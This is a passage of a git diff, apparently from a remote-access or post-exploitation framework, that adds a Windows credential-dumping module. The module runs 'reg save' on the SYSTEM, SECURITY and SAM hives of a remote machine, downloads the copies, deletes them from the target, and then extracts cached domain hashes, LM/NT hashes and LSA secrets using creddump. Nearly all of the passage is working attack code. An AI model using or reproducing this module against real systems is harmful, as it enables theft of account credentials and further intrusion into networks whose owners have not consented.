rep=os.path.join("data","downloads",self.client.short_name(),"hives")
|
||||
try:
|
||||
os.makedirs(rep)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
self.info("saving SYSTEM hives in %TEMP%...")
|
||||
for cmd in ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM /y", "reg save HKLM\\SECURITY %TEMP%/SECURITY /y", "reg save HKLM\\SAM %TEMP%/SAM /y"):
|
||||
self.info("running %s..." % cmd)
|
||||
self.log(shell_exec(self.client, cmd))
|
||||
self.success("hives saved!")
|
||||
remote_temp=self.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||
|
||||
self.info("downloading SYSTEM hive...")
|
||||
download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(rep, "SYSTEM"))
|
||||
|
||||
self.info("downloading SECURITY hive...")
|
||||
download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(rep, "SECURITY"))
|
||||
|
||||
self.info("downloading SAM hive...")
|
||||
download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(rep, "SAM"))
|
||||
|
||||
self.success("hives downloaded to %s" % rep)
|
||||
|
||||
# Cleanup
|
||||
self.info("cleaning up saves...")
|
||||
try:
|
||||
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SYSTEM"))
|
||||
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SECURITY"))
|
||||
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
|
||||
self.success("saves deleted")
|
||||
except Exception as e:
|
||||
self.warning("error deleting temporary files: %s"%str(e))
|
||||
|
||||
# Time to run creddump!
|
||||
# HiveFileAddressSpace - Volatilty
|
||||
sysaddr = HiveFileAddressSpace(os.path.join(rep, "SYSTEM"))
|
||||
secaddr = HiveFileAddressSpace(os.path.join(rep, "SECURITY"))
|
||||
samaddr = HiveFileAddressSpace(os.path.join(rep, "SAM"))
|
||||
|
||||
#detect windows version
|
||||
is_vista=False
|
||||
try:
|
||||
if self.client.conn.modules['sys'].getwindowsversion()[0] >=6:
|
||||
is_vista=True
|
||||
self.info("windows > vista detected")
|
||||
else:
|
||||
self.info("windows < vista detected")
|
||||
except:
|
||||
self.warning("windows version couldn't be determined. supposing vista=False")
|
||||
|
||||
|
||||
# Print the results
|
||||
self.info("dumping cached domain passwords...")
|
||||
|
||||
for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
|
||||
self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'),
|
||||
d.lower(), dn.lower()))
|
||||
|
||||
self.info("dumping LM and NT hashes...")
|
||||
bootkey = get_bootkey(sysaddr)
|
||||
hbootkey = get_hbootkey(samaddr,bootkey)
|
||||
for user in get_user_keys(samaddr):
|
||||
lmhash, nthash = get_user_hashes(user,hbootkey)
|
||||
if not lmhash: lmhash = empty_lm
|
||||
if not nthash: nthash = empty_nt
|
||||
self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16),
|
||||
lmhash.encode('hex'), nthash.encode('hex')))
|
||||
|
||||
self.info("dumping lsa secrets...")
|
||||
secrets = get_file_secrets(os.path.join(rep, "SYSTEM"),
|
||||
os.path.join(rep, "SECURITY"), is_vista)
|
||||
if not secrets:
|
||||
self.error("unable to read LSA secrets, perhaps the hives are corrupted")
|
||||
return
|
||||
for key in secrets:
|
||||
self.log(key)
|
||||
self.log(self.dump(secrets[key], length=16))
|
||||
|
||||
# The End! (hurrah)
|
||||
self.success("dump was successfull!")
|
||||
|
||||
def dump(self, src, length=8):
|
||||
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
|
||||
N=0; result=''
|
||||
while src:
|
||||
s,src = src[:length],src[length:]
|
||||
hexa = ' '.join(["%02X"%ord(x) for x in s])
|
||||
s = s.translate(FILTER)
|
||||
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
|
||||
N+=length
|
||||
return result
|
|
@ -0,0 +1 @@
|
|||
../../../external/creddump7/framework
|
Loading…
Reference in New Issue